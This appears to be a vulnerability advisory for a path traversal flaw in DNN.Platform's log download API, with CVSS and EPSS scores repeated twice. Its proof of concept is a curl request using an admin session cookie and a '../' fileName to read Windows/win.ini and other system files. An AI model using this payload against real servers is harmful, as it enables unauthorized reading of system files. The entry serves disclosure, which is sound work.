Ephvuln74918F40-DC11-4218-ABEF-064EB71A0703Path traversal on administrative account
4.9 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
HIGH
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
3.3 Low
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
MULTIPLE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:M/C:P/I:N/A:N
0.001 Low
EPSS
Percentile
25.4%
Description
Relative path traversal in DNN.Platform at log download functionality. Administrative account can download any system file. This could allow direct read access to files that are not meant to be accessible directly by the platform.
Proof of Concept
Login as administrative user.
Payload tested on DNN 9.1.1
curl -i -s -k -X $'GET' \
-H $'Host: <HOST>' \
-b $'.DOTNETNUKE=<ADMIN_SESSION>' \
$'https://<HOST>/<PATH_TO_DNN>/API/PersonaBar/ServerSettingsLogs/GetLogFile?fileName=../../../../../../Windows/win.ini'
Replace the <HOST>, <ADMIN_SESSION> and <PATH_TO_DNN> with the appropriate values. <PATH_TO_DNN> may include the language selection. Other files than Windows/win.ini may be leaked, such as windows/system32/drivers/etc/hosts. Adjust the number of “…/” depending on the local configuration.
Related
4.9 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
HIGH
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
3.3 Low
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
MULTIPLE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:M/C:P/I:N/A:N
0.001 Low
EPSS
Percentile
25.4%